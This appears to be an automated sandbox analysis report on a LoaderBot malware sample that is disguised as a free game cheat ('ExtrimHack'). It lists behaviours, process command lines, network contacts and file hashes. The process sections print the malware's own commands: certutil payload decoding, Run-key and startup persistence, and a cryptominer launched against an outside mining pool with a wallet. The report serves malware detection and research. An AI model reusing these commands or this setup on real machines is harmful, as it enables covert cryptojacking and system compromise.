Analysis Overview
SHA256
83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696
Threat Level: Known bad
The file 83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696 was found to be: Known bad.
Malicious Activity Summary
LoaderBot
LoaderBot executable
Executes dropped EXE
Drops startup file
Checks computer location settings
Loads dropped DLL
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
NSIS installer
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
Suspicious use of SendNotifyMessage
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-07-08 08:42
Signatures
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2022-07-08 08:42
Reported
2022-07-08 15:47
Platform
win10v2004-20220414-en
Max time kernel
146s
Max time network
163s
Command Line
Signatures
LoaderBot
LoaderBot executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1337\Ex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\1337\Ex.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sys.url | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\RegAsm.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5112 set thread context of 1508 | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe
"C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe"
C:\Users\Admin\AppData\Roaming\1337\Ex.exe
"C:\Users\Admin\AppData\Roaming\1337\Ex.exe"
C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe
"C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo pUVyOKPt
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c mkdir C:\Users\Admin\AppData\Roaming\Sysfiles & cmd < XuGJAWtEjFqgoZUl.com
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\PING.EXE
ping -n 1 moLu.nnnbID
C:\Windows\SysWOW64\certutil.exe
certutil -decode qTh.com y
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
csrss.com y
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com y
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQqTgX5TEtWmQ8ZmVZ7 -p x -k -v=0 --donate-level=1 -t 1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | moLu.nnnbID | udp |
| US | 8.8.8.8:53 | chpMHpkOfJY.chpMHpkOfJY | udp |
| US | 93.184.220.29:80 | tcp | |
| US | 93.184.220.29:80 | tcp | |
| US | 93.184.220.29:80 | tcp | |
| US | 67.26.215.254:80 | tcp | |
| US | 67.26.215.254:80 | tcp | |
| NL | 52.178.17.2:443 | tcp | |
| IE | 20.54.89.106:443 | tcp | |
| NL | 104.110.191.140:80 | tcp | |
| NL | 104.110.191.140:80 | tcp | |
| NL | 104.110.191.140:80 | tcp | |
| US | 13.107.21.200:443 | tcp | |
| US | 52.152.108.96:443 | tcp | |
| US | 8.8.8.8:53 | 151.122.125.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 142.132.131.248:3333 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 176.122.125.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nss9040.tmp\System.dll
| MD5 | 2ae993a2ffec0c137eb51c8832691bcb |
| SHA1 | 98e0b37b7c14890f8a599f35678af5e9435906e1 |
| SHA256 | 681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59 |
| SHA512 | 2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9 |
memory/4708-131-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\1337\Ex.exe
| MD5 | 7afcb8667f1ec33f0cc084936a8a4044 |
| SHA1 | a2755123f3515fbfcbd5b1ab38c22fa757b8afa8 |
| SHA256 | 2304cf3b3d0753318d60c2769c535a164d5f56ee0343c59ac616036d95e8ad71 |
| SHA512 | bc04b81c01df03b360c225709d2db3078d1fb45fc2a67713f5f5154d050c71e241c2c7590f510d9f7ac3a0a4bc820b3b171d96cb56d23c0496df184e527162b8 |
C:\Users\Admin\AppData\Roaming\1337\Ex.exe
| MD5 | 7afcb8667f1ec33f0cc084936a8a4044 |
| SHA1 | a2755123f3515fbfcbd5b1ab38c22fa757b8afa8 |
| SHA256 | 2304cf3b3d0753318d60c2769c535a164d5f56ee0343c59ac616036d95e8ad71 |
| SHA512 | bc04b81c01df03b360c225709d2db3078d1fb45fc2a67713f5f5154d050c71e241c2c7590f510d9f7ac3a0a4bc820b3b171d96cb56d23c0496df184e527162b8 |
memory/4256-134-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe
| MD5 | 6ceb80ab1825ed999d2e16d19de17cb0 |
| SHA1 | 0b553faf5727ffc81c1f1a48563b7bc462850c9e |
| SHA256 | 06c3021e19f97393e42b6f1d86a27b5f3737dffb9af86994cc9037753624045e |
| SHA512 | f5d47e2c0b845660ec8d815eb2fa2fc9527e5faebcfae68dcdd0612de95fbb51f31b2dc698892a35f34033a82866b6b6a2081546c75aa807d7abba8784536f39 |
C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe
| MD5 | 6ceb80ab1825ed999d2e16d19de17cb0 |
| SHA1 | 0b553faf5727ffc81c1f1a48563b7bc462850c9e |
| SHA256 | 06c3021e19f97393e42b6f1d86a27b5f3737dffb9af86994cc9037753624045e |
| SHA512 | f5d47e2c0b845660ec8d815eb2fa2fc9527e5faebcfae68dcdd0612de95fbb51f31b2dc698892a35f34033a82866b6b6a2081546c75aa807d7abba8784536f39 |
memory/4916-137-0x0000000000000000-mapping.dmp
memory/3176-138-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\XuGJAWtEjFqgoZUl.com
| MD5 | 0047726ce0f38e02fda2068d7ff7ceff |
| SHA1 | 0702fd3e290b95b70b5fc3b70cdb57c808baceb7 |
| SHA256 | 0423e080422306752ccf52e4639a8f6e58596176e730d10bd812012ccf4f296b |
| SHA512 | 00b525c341b3297e3b011065b32bab9d29eee920e7faebea93e4fcc4fef69b166c11c10291cc9ba9b931551eca3dc9ddae27b681c4d4423478ea3a65d29c7d83 |
memory/2524-140-0x0000000000000000-mapping.dmp
memory/4400-141-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\EWSiFeMZzkUETFRYRVL.com
| MD5 | c317736793ef5129f12a3568cd679422 |
| SHA1 | e68b55969c5f2159c847a629fac3731c0c315d53 |
| SHA256 | cbb5d906c63cbcb891b35e53156b643ac26c5dec922f43b2fd121ccca60beb62 |
| SHA512 | 69cb5fd5f1a30c3c786ca945b8de6a460d03605fc3416a3c33e69691603e1a43ad0cfefe9cd5d6af1a154b701ecf34526cc05d9235a4e38acf994eb0edb1a82c |
memory/2164-143-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\qTh.com
| MD5 | 13a508782d30a527e997a64996920287 |
| SHA1 | 4628a103700d13b6f3920b3a8a06e9757bf0a9eb |
| SHA256 | e06ad6278f8cdccb51ed58aee3d6ba97bd770b2d8b827746e539770fc959354e |
| SHA512 | cd860c7c8eea0faf0e62f1e695f60c02050c284617265f3e9c11dac4e4cbea34cb656719ae6bdeb39a36dd1446bb443cbcf9c9f4a595c1749f9088d7c082d142 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
| MD5 | 8ed172328f643375ac09b31ffba0eb63 |
| SHA1 | c6716e5e5a311f597e37c5660b0387ab8f77b2a0 |
| SHA256 | 23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928 |
| SHA512 | 79efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938 |
memory/4568-147-0x0000000000000000-mapping.dmp
memory/4380-145-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\y
| MD5 | dbcc4336d132df084c59bbddff9693f5 |
| SHA1 | 172d404379f6d288db4eacaa11bf0fa1ccffa451 |
| SHA256 | ea3b51ae7fb4264cd4aca28f02fa027bb25ce69a9ece5ff1f9f581b1ae62c84e |
| SHA512 | d7209e47c9ef7e8f0db4bc736828e79d745415dde0dbaa7b4d5a21d6ee3406b139f3565cdcae16911c330d3ebbe1bcbe77f5e40d2313909a3b7b58697d3d4e34 |
memory/5112-149-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
| MD5 | 8ed172328f643375ac09b31ffba0eb63 |
| SHA1 | c6716e5e5a311f597e37c5660b0387ab8f77b2a0 |
| SHA256 | 23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928 |
| SHA512 | 79efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\ZcaqngYeMJ.com
| MD5 | 09cc8b02108c2ca6db6197e37b165a65 |
| SHA1 | 9f245c5206ce171cfc288ed8bf05896d1b36a1f0 |
| SHA256 | 89ad1822d2ee2d5e39d2e4aae2016562244f7ea43071c192e8989a3c2544d998 |
| SHA512 | d50c20b554dd85996f8b7432fb3d3668c3fbfcd77314a4adc476861373a0350b122be61ab1aa087153e45c48cf6a453d0829ccfa4786cf679ee3dccb7cffadae |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
| MD5 | 8ed172328f643375ac09b31ffba0eb63 |
| SHA1 | c6716e5e5a311f597e37c5660b0387ab8f77b2a0 |
| SHA256 | 23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928 |
| SHA512 | 79efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938 |
memory/1508-153-0x0000000000000000-mapping.dmp
memory/1508-154-0x0000000012580000-0x00000000127D4000-memory.dmp
memory/1508-155-0x00000000176B0000-0x0000000017716000-memory.dmp
memory/2520-156-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/2520-159-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/2520-160-0x00000000001D0000-0x00000000001E4000-memory.dmp
memory/2520-161-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2520-162-0x0000000000420000-0x0000000000440000-memory.dmp
memory/2520-163-0x0000000000420000-0x0000000000440000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2022-07-08 08:42
Reported
2022-07-08 15:49
Platform
win7-20220414-en
Max time kernel
115s
Max time network
78s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1337\Ex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sys.url | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe
"C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe"
C:\Users\Admin\AppData\Roaming\1337\Ex.exe
"C:\Users\Admin\AppData\Roaming\1337\Ex.exe"
C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe
"C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo pUVyOKPt
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c mkdir C:\Users\Admin\AppData\Roaming\Sysfiles & cmd < XuGJAWtEjFqgoZUl.com
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\PING.EXE
ping -n 1 moLu.nnnbID
C:\Windows\SysWOW64\certutil.exe
certutil -decode qTh.com y
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
csrss.com y
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com y
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | moLu.nnnbID | udp |
| US | 8.8.8.8:53 | chpMHpkOfJY.chpMHpkOfJY | udp |
Files
memory/1884-54-0x0000000075E51000-0x0000000075E53000-memory.dmp
\Users\Admin\AppData\Local\Temp\nst28F7.tmp\System.dll
| MD5 | 2ae993a2ffec0c137eb51c8832691bcb |
| SHA1 | 98e0b37b7c14890f8a599f35678af5e9435906e1 |
| SHA256 | 681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59 |
| SHA512 | 2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9 |
\Users\Admin\AppData\Roaming\1337\Ex.exe
| MD5 | 7afcb8667f1ec33f0cc084936a8a4044 |
| SHA1 | a2755123f3515fbfcbd5b1ab38c22fa757b8afa8 |
| SHA256 | 2304cf3b3d0753318d60c2769c535a164d5f56ee0343c59ac616036d95e8ad71 |
| SHA512 | bc04b81c01df03b360c225709d2db3078d1fb45fc2a67713f5f5154d050c71e241c2c7590f510d9f7ac3a0a4bc820b3b171d96cb56d23c0496df184e527162b8 |
memory/976-57-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\1337\Ex.exe
| MD5 | 7afcb8667f1ec33f0cc084936a8a4044 |
| SHA1 | a2755123f3515fbfcbd5b1ab38c22fa757b8afa8 |
| SHA256 | 2304cf3b3d0753318d60c2769c535a164d5f56ee0343c59ac616036d95e8ad71 |
| SHA512 | bc04b81c01df03b360c225709d2db3078d1fb45fc2a67713f5f5154d050c71e241c2c7590f510d9f7ac3a0a4bc820b3b171d96cb56d23c0496df184e527162b8 |
C:\Users\Admin\AppData\Roaming\1337\Ex.exe
| MD5 | 7afcb8667f1ec33f0cc084936a8a4044 |
| SHA1 | a2755123f3515fbfcbd5b1ab38c22fa757b8afa8 |
| SHA256 | 2304cf3b3d0753318d60c2769c535a164d5f56ee0343c59ac616036d95e8ad71 |
| SHA512 | bc04b81c01df03b360c225709d2db3078d1fb45fc2a67713f5f5154d050c71e241c2c7590f510d9f7ac3a0a4bc820b3b171d96cb56d23c0496df184e527162b8 |
\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe
| MD5 | 6ceb80ab1825ed999d2e16d19de17cb0 |
| SHA1 | 0b553faf5727ffc81c1f1a48563b7bc462850c9e |
| SHA256 | 06c3021e19f97393e42b6f1d86a27b5f3737dffb9af86994cc9037753624045e |
| SHA512 | f5d47e2c0b845660ec8d815eb2fa2fc9527e5faebcfae68dcdd0612de95fbb51f31b2dc698892a35f34033a82866b6b6a2081546c75aa807d7abba8784536f39 |
memory/1940-62-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe
| MD5 | 6ceb80ab1825ed999d2e16d19de17cb0 |
| SHA1 | 0b553faf5727ffc81c1f1a48563b7bc462850c9e |
| SHA256 | 06c3021e19f97393e42b6f1d86a27b5f3737dffb9af86994cc9037753624045e |
| SHA512 | f5d47e2c0b845660ec8d815eb2fa2fc9527e5faebcfae68dcdd0612de95fbb51f31b2dc698892a35f34033a82866b6b6a2081546c75aa807d7abba8784536f39 |
memory/1992-64-0x0000000000000000-mapping.dmp
memory/1860-65-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\XuGJAWtEjFqgoZUl.com
| MD5 | 0047726ce0f38e02fda2068d7ff7ceff |
| SHA1 | 0702fd3e290b95b70b5fc3b70cdb57c808baceb7 |
| SHA256 | 0423e080422306752ccf52e4639a8f6e58596176e730d10bd812012ccf4f296b |
| SHA512 | 00b525c341b3297e3b011065b32bab9d29eee920e7faebea93e4fcc4fef69b166c11c10291cc9ba9b931551eca3dc9ddae27b681c4d4423478ea3a65d29c7d83 |
memory/588-67-0x0000000000000000-mapping.dmp
memory/1180-68-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\EWSiFeMZzkUETFRYRVL.com
| MD5 | c317736793ef5129f12a3568cd679422 |
| SHA1 | e68b55969c5f2159c847a629fac3731c0c315d53 |
| SHA256 | cbb5d906c63cbcb891b35e53156b643ac26c5dec922f43b2fd121ccca60beb62 |
| SHA512 | 69cb5fd5f1a30c3c786ca945b8de6a460d03605fc3416a3c33e69691603e1a43ad0cfefe9cd5d6af1a154b701ecf34526cc05d9235a4e38acf994eb0edb1a82c |
memory/860-70-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\qTh.com
| MD5 | 13a508782d30a527e997a64996920287 |
| SHA1 | 4628a103700d13b6f3920b3a8a06e9757bf0a9eb |
| SHA256 | e06ad6278f8cdccb51ed58aee3d6ba97bd770b2d8b827746e539770fc959354e |
| SHA512 | cd860c7c8eea0faf0e62f1e695f60c02050c284617265f3e9c11dac4e4cbea34cb656719ae6bdeb39a36dd1446bb443cbcf9c9f4a595c1749f9088d7c082d142 |
\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
| MD5 | 8ed172328f643375ac09b31ffba0eb63 |
| SHA1 | c6716e5e5a311f597e37c5660b0387ab8f77b2a0 |
| SHA256 | 23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928 |
| SHA512 | 79efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
| MD5 | 8ed172328f643375ac09b31ffba0eb63 |
| SHA1 | c6716e5e5a311f597e37c5660b0387ab8f77b2a0 |
| SHA256 | 23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928 |
| SHA512 | 79efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938 |
memory/832-76-0x0000000000000000-mapping.dmp
memory/1552-74-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\y
| MD5 | dbcc4336d132df084c59bbddff9693f5 |
| SHA1 | 172d404379f6d288db4eacaa11bf0fa1ccffa451 |
| SHA256 | ea3b51ae7fb4264cd4aca28f02fa027bb25ce69a9ece5ff1f9f581b1ae62c84e |
| SHA512 | d7209e47c9ef7e8f0db4bc736828e79d745415dde0dbaa7b4d5a21d6ee3406b139f3565cdcae16911c330d3ebbe1bcbe77f5e40d2313909a3b7b58697d3d4e34 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
| MD5 | 8ed172328f643375ac09b31ffba0eb63 |
| SHA1 | c6716e5e5a311f597e37c5660b0387ab8f77b2a0 |
| SHA256 | 23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928 |
| SHA512 | 79efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
| MD5 | 8ed172328f643375ac09b31ffba0eb63 |
| SHA1 | c6716e5e5a311f597e37c5660b0387ab8f77b2a0 |
| SHA256 | 23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928 |
| SHA512 | 79efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938 |
memory/1072-81-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
| MD5 | 8ed172328f643375ac09b31ffba0eb63 |
